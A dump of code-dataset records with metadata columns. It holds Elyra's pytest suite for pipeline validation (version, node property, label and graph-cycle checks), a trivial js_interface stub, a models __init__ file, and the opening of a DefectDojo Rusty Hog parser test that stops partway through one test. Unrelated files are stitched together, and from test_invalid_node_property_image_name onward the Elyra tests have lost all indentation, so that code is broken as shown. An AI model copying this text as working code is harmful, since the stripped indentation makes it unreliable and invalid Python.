f0849556e0a13e8caa72be8225fd3bc0fe323167
| 29,633
|
py
|
Python
|
elyra/tests/pipeline/test_validation.py
|
el-aasi/elyra
|
bd06a22c97a5e6083d5a29d88303142e826e2eab
|
[
"Apache-2.0"
] | 1
|
2022-02-18T14:21:33.000Z
|
2022-02-18T14:21:33.000Z
|
elyra/tests/pipeline/test_validation.py
|
el-aasi/elyra
|
bd06a22c97a5e6083d5a29d88303142e826e2eab
|
[
"Apache-2.0"
] | null | null | null |
elyra/tests/pipeline/test_validation.py
|
el-aasi/elyra
|
bd06a22c97a5e6083d5a29d88303142e826e2eab
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2018-2022 Elyra Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from conftest import AIRFLOW_COMPONENT_CACHE_INSTANCE
from conftest import KFP_COMPONENT_CACHE_INSTANCE
import pytest
from elyra.pipeline.pipeline import PIPELINE_CURRENT_VERSION
from elyra.pipeline.pipeline_definition import PipelineDefinition
from elyra.pipeline.validation import PipelineValidationManager
from elyra.pipeline.validation import ValidationResponse
from elyra.tests.pipeline.util import _read_pipeline_resource
@pytest.fixture
def load_pipeline():
    """Yield a loader that reads a validation pipeline and pairs it with a fresh response."""
    def _loader(pipeline_filepath):
        # A new ValidationResponse per call keeps tests isolated from each other.
        loaded = _read_pipeline_resource(f'resources/validation_pipelines/{pipeline_filepath}')
        return loaded, ValidationResponse()
    yield _loader
@pytest.fixture
def validation_manager(setup_factory_data):
    """Yield a PipelineValidationManager rooted at the test resources; clear the singleton afterwards."""
    resource_dir = os.path.join(os.getcwd(), os.path.dirname(__file__), "resources/validation_pipelines")
    manager = PipelineValidationManager.instance(root_dir=os.path.realpath(resource_dir))
    yield manager
    # The manager is a singleton; reset it so later tests start from scratch.
    PipelineValidationManager.clear_instance()
def test_invalid_lower_pipeline_version(validation_manager, load_pipeline):
    """A pipeline older than PIPELINE_CURRENT_VERSION must be flagged as needing migration.

    NOTE: this test was declared ``async`` although it awaits nothing; without
    an asyncio marker pytest would not execute the coroutine body.  It is now a
    plain function, matching test_invalid_upper_pipeline_version.
    """
    pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
    pipeline_version = PIPELINE_CURRENT_VERSION - 1
    pipeline['pipelines'][0]['app_data']['version'] = pipeline_version
    pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
    validation_manager._validate_pipeline_structure(pipeline_definition=pipeline_definition, response=response)
    issues = response.to_json().get('issues')
    # Exactly one fatal (severity 1) issue pointing at the stale version.
    assert len(issues) == 1
    assert issues[0]['severity'] == 1
    assert issues[0]['type'] == 'invalidPipeline'
    assert issues[0]['message'] == f'Pipeline version {pipeline_version} is out of date '\
                                   'and needs to be migrated using the Elyra pipeline editor.'
def test_invalid_upper_pipeline_version(validation_manager, load_pipeline):
    """A pipeline saved by a newer Elyra must be reported as too new to open."""
    pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
    pipeline_version = PIPELINE_CURRENT_VERSION + 1
    pipeline['pipelines'][0]['app_data']['version'] = pipeline_version
    definition = PipelineDefinition(pipeline_definition=pipeline)
    validation_manager._validate_pipeline_structure(pipeline_definition=definition, response=response)
    issues = response.to_json().get('issues')
    assert len(issues) == 1
    issue = issues[0]
    assert issue['severity'] == 1
    assert issue['type'] == 'invalidPipeline'
    expected_message = 'Pipeline was last edited in a newer version of Elyra. '\
                       'Update Elyra to use this pipeline.'
    assert issue['message'] == expected_message
def test_invalid_pipeline_version_that_needs_migration(validation_manager, load_pipeline):
    """A legacy (version 3) pipeline should raise a single migration-needed issue."""
    pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
    pipeline['pipelines'][0]['app_data']['version'] = 3
    definition = PipelineDefinition(pipeline_definition=pipeline)
    validation_manager._validate_pipeline_structure(pipeline_definition=definition, response=response)
    issues = response.to_json().get('issues')
    assert len(issues) == 1
    issue = issues[0]
    assert issue['severity'] == 1
    assert issue['type'] == 'invalidPipeline'
    assert "needs to be migrated" in issue['message']
def test_basic_pipeline_structure(validation_manager, load_pipeline):
    """A well-formed notebook-only pipeline passes structure validation with no issues."""
    pipeline, response = load_pipeline('generic_basic_pipeline_only_notebook.pipeline')
    definition = PipelineDefinition(pipeline_definition=pipeline)
    validation_manager._validate_pipeline_structure(pipeline_definition=definition, response=response)
    assert not response.has_fatal
    assert not response.to_json().get('issues')
def test_basic_pipeline_structure_with_scripts(validation_manager, load_pipeline):
    """A well-formed script-based pipeline passes structure validation with no issues."""
    pipeline, response = load_pipeline('generic_basic_pipeline_with_scripts.pipeline')
    definition = PipelineDefinition(pipeline_definition=pipeline)
    validation_manager._validate_pipeline_structure(pipeline_definition=definition, response=response)
    assert not response.has_fatal
    assert not response.to_json().get('issues')
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_invalid_runtime_node_kubeflow(validation_manager, load_pipeline, component_cache_instance):
    """A node whose op is unknown to the KFP runtime yields one invalidNodeType issue."""
    expected_node_id = "eace43f8-c4b1-4a25-b331-d57d4fc29426"
    pipeline, response = load_pipeline('kf_invalid_node_op.pipeline')
    await validation_manager._validate_compatibility(
        pipeline_definition=PipelineDefinition(pipeline_definition=pipeline),
        response=response,
        pipeline_type='KUBEFLOW_PIPELINES',
        pipeline_runtime='kfp')
    issues = response.to_json().get('issues')
    assert len(issues) == 1
    issue = issues[0]
    assert issue['severity'] == 1
    assert issue['type'] == 'invalidNodeType'
    assert issue['data']['nodeID'] == expected_node_id
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_invalid_runtime_node_kubeflow_with_supernode(validation_manager,
                                                            load_pipeline,
                                                            component_cache_instance):
    """An invalid node nested in a supernode is reported with both its node and pipeline ids."""
    pipeline, response = load_pipeline('kf_invalid_node_op_with_supernode.pipeline')
    node_id = "98aa7270-639b-42a4-9a07-b31cd0fa3205"
    pipeline_id = "00304a2b-dec4-4a73-ab4a-6830f97d7855"
    pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
    await validation_manager._validate_compatibility(pipeline_definition=pipeline_definition,
                                                     response=response,
                                                     pipeline_type='KUBEFLOW_PIPELINES',
                                                     pipeline_runtime='kfp')
    issues = response.to_json().get('issues')
    # (leftover debug ``print(issues)`` removed -- it only cluttered pytest output)
    assert len(issues) == 1
    assert issues[0]['severity'] == 1
    assert issues[0]['type'] == 'invalidNodeType'
    assert issues[0]['data']['pipelineId'] == pipeline_id
    assert issues[0]['data']['nodeID'] == node_id
async def test_invalid_pipeline_runtime_with_kubeflow_execution(validation_manager, load_pipeline):
    """Submitting an Airflow-typed pipeline to the kfp runtime must raise invalidRuntime."""
    pipeline, response = load_pipeline('generic_basic_pipeline_with_scripts.pipeline')
    await validation_manager._validate_compatibility(
        pipeline_definition=PipelineDefinition(pipeline_definition=pipeline),
        response=response,
        pipeline_type='APACHE_AIRFLOW',
        pipeline_runtime='kfp')
    issues = response.to_json().get('issues')
    assert len(issues) == 1
    issue = issues[0]
    assert issue['severity'] == 1
    assert issue['type'] == 'invalidRuntime'
async def test_invalid_pipeline_runtime_with_local_execution(validation_manager, load_pipeline):
    """Running an Airflow-typed pipeline locally must raise invalidRuntime with the pipeline type attached."""
    pipeline, response = load_pipeline('generic_basic_pipeline_with_scripts.pipeline')
    await validation_manager._validate_compatibility(
        pipeline_definition=PipelineDefinition(pipeline_definition=pipeline),
        response=response,
        pipeline_type='APACHE_AIRFLOW',
        pipeline_runtime='local')
    issues = response.to_json().get('issues')
    assert len(issues) == 1
    issue = issues[0]
    assert issue['severity'] == 1
    assert issue['type'] == 'invalidRuntime'
    assert issue['data']['pipelineType'] == 'APACHE_AIRFLOW'
async def test_invalid_node_op_with_airflow(validation_manager, load_pipeline):
    """An unknown node op under the Airflow runtime produces one invalidNodeType issue."""
    expected_node_id = "749d4641-cee8-4a50-a0ed-30c07439908f"
    pipeline, response = load_pipeline('aa_invalid_node_op.pipeline')
    await validation_manager._validate_compatibility(
        pipeline_definition=PipelineDefinition(pipeline_definition=pipeline),
        response=response,
        pipeline_type='APACHE_AIRFLOW',
        pipeline_runtime='airflow')
    issues = response.to_json().get('issues')
    assert len(issues) == 1
    issue = issues[0]
    assert issue['severity'] == 1
    assert issue['type'] == 'invalidNodeType'
    assert issue['data']['nodeID'] == expected_node_id
async def test_invalid_node_property_structure(monkeypatch, load_pipeline):
    """A malformed node property (here: runtime_image) is reported as invalidNodeProperty."""
    pipeline, response = load_pipeline('generic_invalid_node_property_structure.pipeline')
    node_id = '88ab83dc-d5f0-443a-8837-788ed16851b7'
    node_property = 'runtime_image'
    pvm = PipelineValidationManager.instance()
    # Stub out the filepath and label validators so only the property-structure
    # check can produce issues.  The lambda parameter lists must mirror the real
    # methods' signatures exactly, since the production code calls them as-is.
    monkeypatch.setattr(pvm, "_validate_filepath", lambda node_id, node_label,
                        property_name, filename, response: True)
    monkeypatch.setattr(pvm, "_validate_label", lambda node_id, node_label,
                        response: True)
    pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
    await pvm._validate_node_properties(pipeline_definition=pipeline_definition,
                                        response=response,
                                        pipeline_type='GENERIC',
                                        pipeline_runtime='kfp')
    issues = response.to_json().get('issues')
    # Exactly one fatal issue naming the offending property and node.
    assert len(issues) == 1
    assert issues[0]['severity'] == 1
    assert issues[0]['type'] == 'invalidNodeProperty'
    assert issues[0]['data']['propertyName'] == node_property
    assert issues[0]['data']['nodeID'] == node_id
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_missing_node_property_for_kubeflow_pipeline(monkeypatch, load_pipeline, component_cache_instance):
    """A KFP component node missing a required property is flagged as invalidNodeProperty."""
    expected_node_id = 'fe08b42d-bd8c-4e97-8010-0503a3185427'
    expected_property = "notebook"
    pipeline, response = load_pipeline('kf_invalid_node_property_in_component.pipeline')
    pvm = PipelineValidationManager.instance()
    # Short-circuit file-existence checks; only property presence is under test here.
    monkeypatch.setattr(pvm, "_validate_filepath", lambda node_id, file_dir, property_name, filename, response: True)
    await pvm._validate_node_properties(pipeline_definition=PipelineDefinition(pipeline_definition=pipeline),
                                        response=response,
                                        pipeline_type='KUBEFLOW_PIPELINES',
                                        pipeline_runtime='kfp')
    issues = response.to_json().get('issues')
    assert len(issues) == 1
    issue = issues[0]
    assert issue['severity'] == 1
    assert issue['type'] == 'invalidNodeProperty'
    assert issue['data']['propertyName'] == expected_property
    assert issue['data']['nodeID'] == expected_node_id
def test_invalid_node_property_image_name(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_invalid_node_property_image_name.pipeline')
node_ids = ['88ab83dc-d5f0-443a-8837-788ed16851b7', '7ae74ba6-d49f-48ea-9e4f-e44d13594b2f']
node_property = 'runtime_image'
for i, node_id in enumerate(node_ids):
node = pipeline['pipelines'][0]['nodes'][i]
node_label = node['app_data'].get('label')
image_name = node['app_data']['component_parameters'].get('runtime_image')
validation_manager._validate_container_image_name(node['id'], node_label, image_name, response)
issues = response.to_json().get('issues')
assert len(issues) == 2
# Test missing runtime image in node 0
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['propertyName'] == node_property
assert issues[0]['data']['nodeID'] == node_ids[0]
assert issues[0]['message'] == 'Required property value is missing.'
# Test invalid format for runtime image in node 1
assert issues[1]['severity'] == 1
assert issues[1]['type'] == 'invalidNodeProperty'
assert issues[1]['data']['propertyName'] == node_property
assert issues[1]['data']['nodeID'] == node_ids[1]
assert issues[1]['message'] == 'Node contains an invalid runtime image. Runtime image '\
'must conform to the format [registry/]owner/image:tag'
def test_invalid_node_property_image_name_list(validation_manager):
response = ValidationResponse()
node_label = "test_label"
node_id = "test-id"
failing_image_names = ["12345566:one-two-three",
"someregistry.io/some_org/some_tag/something/",
"docker.io//missing_org_name:test"]
for image_name in failing_image_names:
validation_manager._validate_container_image_name(node_id, node_label, image_name, response)
issues = response.to_json().get('issues')
assert len(issues) == len(failing_image_names)
def test_invalid_node_property_dependency_filepath_workspace(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
property_name = 'test-property'
validation_manager._validate_filepath(node_id=node['id'], file_dir=os.getcwd(),
property_name=property_name,
node_label=node['app_data']['label'],
filename='../invalid_filepath/to/file.ipynb',
response=response)
issues = response.to_json().get('issues')
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidFilePath'
assert issues[0]['data']['propertyName'] == property_name
assert issues[0]['data']['nodeID'] == node['id']
def test_invalid_node_property_dependency_filepath_non_existent(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
property_name = 'test-property'
validation_manager._validate_filepath(node_id=node['id'], file_dir=os.getcwd(),
property_name=property_name,
node_label=node['app_data']['label'],
filename='invalid_filepath/to/file.ipynb',
response=response)
issues = response.to_json().get('issues')
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidFilePath'
assert issues[0]['data']['propertyName'] == property_name
assert issues[0]['data']['nodeID'] == node['id']
def test_valid_node_property_dependency_filepath(validation_manager):
response = ValidationResponse()
valid_filename = os.path.join(os.path.dirname(__file__),
'resources/validation_pipelines/generic_single_cycle.pipeline')
node = {"id": "test-id", "app_data": {"label": "test"}}
property_name = 'test-property'
validation_manager._validate_filepath(node_id=node['id'], file_dir=os.getcwd(),
property_name=property_name,
node_label=node['app_data']['label'],
filename=valid_filename,
response=response)
assert not response.has_fatal
assert not response.to_json().get('issues')
async def test_valid_node_property_pipeline_filepath(monkeypatch, validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_basic_filepath_check.pipeline')
monkeypatch.setattr(validation_manager, "_validate_label", lambda node_id, node_label,
response: True)
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='GENERIC',
pipeline_runtime='kfp')
assert not response.has_fatal
assert not response.to_json().get('issues')
def test_invalid_node_property_resource_value(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_invalid_node_property_hardware_resources.pipeline')
node_id = '88ab83dc-d5f0-443a-8837-788ed16851b7'
node = pipeline['pipelines'][0]['nodes'][0]
validation_manager._validate_resource_value(node['id'], node['app_data']['label'],
resource_name='memory',
resource_value=node['app_data']['component_parameters']['memory'],
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['propertyName'] == 'memory'
assert issues[0]['data']['nodeID'] == node_id
def test_invalid_node_property_env_var(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
invalid_env_var = "TEST_ENV_ONE\"test_one\""
validation_manager._validate_environmental_variables(node_id=node['id'],
node_label=node['app_data']['label'],
env_var=invalid_env_var,
response=response)
issues = response.to_json().get('issues')
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidEnvPair'
assert issues[0]['data']['propertyName'] == 'env_vars'
assert issues[0]['data']['nodeID'] == "test-id"
def test_valid_node_property_label(validation_manager):
response = ValidationResponse()
node = {"id": "test-id"}
valid_label_name = "dead-bread-dead-bread-dead-bread-dead-bread-dead-bread-dead-bre"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
def test_valid_node_property_label_min_length(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
valid_label_name = "d"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
def test_invalid_node_property_label_filename_exceeds_max_length(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
valid_label_name = "deadbread-deadbread-deadbread-deadbread-deadbread-deadbread-de.py"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 2
def test_invalid_node_property_label_max_length(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
invalid_label_name = "dead-bread-dead-bread-dead-bread-dead-bread-dead-bread-dead-bred"
validation_manager._validate_label(node_id=node['id'],
node_label=invalid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 2
assert issues[0]['type'] == 'invalidNodeLabel'
assert issues[0]['data']['propertyName'] == 'label'
assert issues[0]['data']['nodeID'] == "test-id"
def test_valid_node_property_label_filename_has_relative_path(validation_manager):
response = ValidationResponse()
node = {"id": "test-id", "app_data": {"label": "test"}}
valid_label_name = "deadbread.py"
validation_manager._validate_label(node_id=node['id'],
node_label=valid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
def test_invalid_node_property_label_bad_characters(validation_manager):
response = ValidationResponse()
node = {"id": "test-id"}
invalid_label_name = "bad_label_*&^&$"
validation_manager._validate_label(node_id=node['id'],
node_label=invalid_label_name,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 2
assert issues[0]['type'] == 'invalidNodeLabel'
assert issues[0]['data']['propertyName'] == 'label'
assert issues[0]['data']['nodeID'] == "test-id"
def test_pipeline_graph_single_cycle(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_single_cycle.pipeline')
# cycle_ID = ['c309f6dd-b022-4b1c-b2b0-b6449bb26e8f', '8cb986cb-4fc9-4b1d-864d-0ec64b7ac13c']
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'circularReference'
# assert issues[0]['data']['linkIDList'].sort() == cycle_ID.sort()
def test_pipeline_graph_double_cycle(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_double_cycle.pipeline')
# cycle_ID = ['597b2971-b95d-4df7-a36d-9d93b0345298', 'b63378e4-9085-4a33-9330-6f86054681f4']
# cycle_two_ID = ['c309f6dd-b022-4b1c-b2b0-b6449bb26e8f', '8cb986cb-4fc9-4b1d-864d-0ec64b7ac13c']
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'circularReference'
# assert issues[0]['data']['linkIDList'].sort() == cycle_ID.sort()
# assert issues[1]['severity'] == 1
# assert issues[1]['type'] == 'circularReference'
# assert issues[1]['data']['linkIDList'].sort() == cycle_two_ID.sort()
def test_pipeline_graph_singleton(validation_manager, load_pipeline):
pipeline, response = load_pipeline('generic_singleton.pipeline')
node_id = '0195fefd-3ceb-4a90-a12c-3958ef0ff42e'
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert not response.has_fatal
assert issues[0]['severity'] == 2
assert issues[0]['type'] == 'singletonReference'
assert issues[0]['data']['nodeID'] == node_id
def test_pipeline_valid_kfp_with_supernode(validation_manager, load_pipeline):
pipeline, response = load_pipeline('kf_supernode_valid.pipeline')
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 0
assert not response.has_fatal
def test_pipeline_invalid_single_cycle_kfp_with_supernode(validation_manager, load_pipeline):
pipeline, response = load_pipeline('kf_supernode_invalid_single_cycle.pipeline')
validation_manager._validate_pipeline_graph(pipeline=pipeline,
response=response)
issues = response.to_json().get('issues')
assert len(issues) == 1
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'circularReference'
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_kfp_inputpath_parameter(validation_manager, load_pipeline, component_cache_instance):
pipeline, response = load_pipeline('kf_inputpath_parameter.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 0
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_invalid_kfp_inputpath_parameter(validation_manager,
load_pipeline,
component_cache_instance):
invalid_key_node_id = "089a12df-fe2f-4fcb-ae37-a1f8a6259ca1"
missing_param_node_id = "e8820c55-dc79-46d1-b32e-924fa5d70d2a"
pipeline, response = load_pipeline('kf_invalid_inputpath_parameter.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 2
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['nodeID'] == invalid_key_node_id
assert issues[1]['severity'] == 1
assert issues[1]['type'] == 'invalidNodeProperty'
assert issues[1]['data']['nodeID'] == missing_param_node_id
@pytest.mark.parametrize('component_cache_instance', [KFP_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_invalid_kfp_inputpath_missing_connection(validation_manager,
load_pipeline,
component_cache_instance):
invalid_node_id = "5b78ea0a-e5fc-4022-94d4-7b9dc170d794"
pipeline, response = load_pipeline('kf_invalid_inputpath_missing_connection.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='KUBEFLOW_PIPELINES',
pipeline_runtime='kfp')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['nodeID'] == invalid_node_id
@pytest.mark.parametrize('component_cache_instance', [AIRFLOW_COMPONENT_CACHE_INSTANCE], indirect=True)
async def test_pipeline_aa_parent_node_missing_xcom_push(validation_manager,
load_pipeline,
component_cache_instance):
invalid_node_id = 'b863d458-21b5-4a46-8420-5a814b7bd525'
invalid_operator = 'BashOperator'
pipeline, response = load_pipeline('aa_parent_node_missing_xcom.pipeline')
pipeline_definition = PipelineDefinition(pipeline_definition=pipeline)
await validation_manager._validate_node_properties(pipeline_definition=pipeline_definition,
response=response,
pipeline_type='APACHE_AIRFLOW',
pipeline_runtime='airflow')
issues = response.to_json().get('issues')
assert len(issues) == 1
assert response.has_fatal
assert issues[0]['severity'] == 1
assert issues[0]['type'] == 'invalidNodeProperty'
assert issues[0]['data']['nodeID'] == invalid_node_id
assert issues[0]['data']['parentNodeID'] == invalid_operator
| 48.89934
| 117
| 0.653326
| 3,095
| 29,633
| 5.95832
| 0.110178
| 0.059867
| 0.057101
| 0.02733
| 0.802397
| 0.76818
| 0.75061
| 0.731522
| 0.719755
| 0.701752
| 0
| 0.026134
| 0.240745
| 29,633
| 605
| 118
| 48.980165
| 0.793502
| 0.040394
| 0
| 0.683406
| 0
| 0.004367
| 0.170961
| 0.075431
| 0
| 0
| 0
| 0
| 0.283843
| 1
| 0.054585
| false
| 0
| 0.019651
| 0
| 0.076419
| 0.002183
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b2caa5e05898f9af61dd2127cdd25861fa8ba33e
| 48
|
py
|
Python
|
src/widgets/js_interface.py
|
charlestian/NetEaseMusic
|
5d8fa4747fcecabb5a09174ff6838718d62c2b31
|
[
"MIT"
] | 19
|
2015-04-18T15:16:58.000Z
|
2021-04-12T06:19:48.000Z
|
src/widgets/js_interface.py
|
charlestian/NetEaseMusic
|
5d8fa4747fcecabb5a09174ff6838718d62c2b31
|
[
"MIT"
] | null | null | null |
src/widgets/js_interface.py
|
charlestian/NetEaseMusic
|
5d8fa4747fcecabb5a09174ff6838718d62c2b31
|
[
"MIT"
] | 12
|
2015-04-18T15:16:59.000Z
|
2016-04-20T17:22:58.000Z
|
# -*- coding: utf8 -*-
def js_test():
pass
| 9.6
| 22
| 0.5
| 6
| 48
| 3.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.270833
| 48
| 5
| 23
| 9.6
| 0.628571
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
b2e06e63daa5c48b0b71e14d79ded7d54d194008
| 192
|
py
|
Python
|
ssl_framework/models/__init__.py
|
ananyahjha93/libself
|
f43cf8d60db97bb47652eecf06efa1801e850b9f
|
[
"MIT"
] | 11
|
2020-02-14T21:29:45.000Z
|
2021-07-30T18:49:47.000Z
|
ssl_framework/models/__init__.py
|
ananyahjha93/libself
|
f43cf8d60db97bb47652eecf06efa1801e850b9f
|
[
"MIT"
] | null | null | null |
ssl_framework/models/__init__.py
|
ananyahjha93/libself
|
f43cf8d60db97bb47652eecf06efa1801e850b9f
|
[
"MIT"
] | 2
|
2020-10-21T08:11:12.000Z
|
2020-11-20T11:57:43.000Z
|
from ssl_framework.models.abstract_image_model import AbstractImageModel
from ssl_framework.models.jigsaw_image_model import JigsawImageModel
MODELS = {'jigsaw_image_model': JigsawImageModel}
| 48
| 72
| 0.885417
| 23
| 192
| 7.043478
| 0.478261
| 0.185185
| 0.197531
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 192
| 4
| 73
| 48
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0.093264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b2e7573fa0f891e845e390e8c0f61b291ad3a46d
| 7,913
|
py
|
Python
|
unittests/tools/test_rusty_hog_parser.py
|
dant24/django-DefectDojo
|
caf5c91b3f8870d5f466dfaaf5a3a096f8812ad9
|
[
"BSD-3-Clause"
] | 249
|
2016-09-06T21:04:40.000Z
|
2018-01-19T15:59:44.000Z
|
unittests/tools/test_rusty_hog_parser.py
|
dant24/django-DefectDojo
|
caf5c91b3f8870d5f466dfaaf5a3a096f8812ad9
|
[
"BSD-3-Clause"
] | 255
|
2016-09-06T21:36:37.000Z
|
2018-01-19T19:57:57.000Z
|
unittests/tools/test_rusty_hog_parser.py
|
dant24/django-DefectDojo
|
caf5c91b3f8870d5f466dfaaf5a3a096f8812ad9
|
[
"BSD-3-Clause"
] | 152
|
2016-09-06T21:04:54.000Z
|
2018-01-18T08:52:24.000Z
|
from ..dojo_test_case import DojoTestCase
from dojo.tools.rusty_hog.parser import RustyhogParser
from dojo.models import Test
class TestRustyhogParser(DojoTestCase):
def test_parse_file_with_no_vuln_has_no_finding_choctawhog(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_no_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Rusty Hog", Test()) # The outputfile is empty. A subscanner can't be classified
self.assertEqual(0, len(findings))
def test_parse_file_with_one_vuln_has_one_finding_choctawhog(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_one_vuln.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Choctaw Hog", Test())
self.assertEqual(1, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_choctawhog(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Choctaw Hog", Test())
self.assertEqual(13, len(findings))
def test_parse_file_with_multiple_vuln_has_multiple_finding_choctawhog_content(self):
testfile = open("unittests/scans/rusty_hog/choctawhog_many_vulns.json")
parser = RustyhogParser()
findings = parser.get_items(testfile, "Choctaw Hog", Test())
self.assertEqual(findings[0].title, "Email address found in Git path .github/workflows/main.yml (a7bce96377c4ff2ac16cd51fb0da7fe7ea678829)")
self.assertIn("**This string was found:** ['dojo-helpers@this-repo.com']", findings[0].description)
self.assertIn("**Commit message:** removing action", findings[0].description)
self.assertIn("**Commit hash:** a7bce96377c4ff2ac16cd51fb0da7fe7ea678829", findings[0].description)
self.assertIn("**Parent commit hash:** d8b2f39e826321896a3c7c474fc40dfc0d1fc586", findings[0].description)
self.assertIn("**Old and new file IDs:** 2aba123d6e872777c8cf39ee34664d70e0b90ff0 - 0000000000000000000000000000000000000000", findings[0].description)
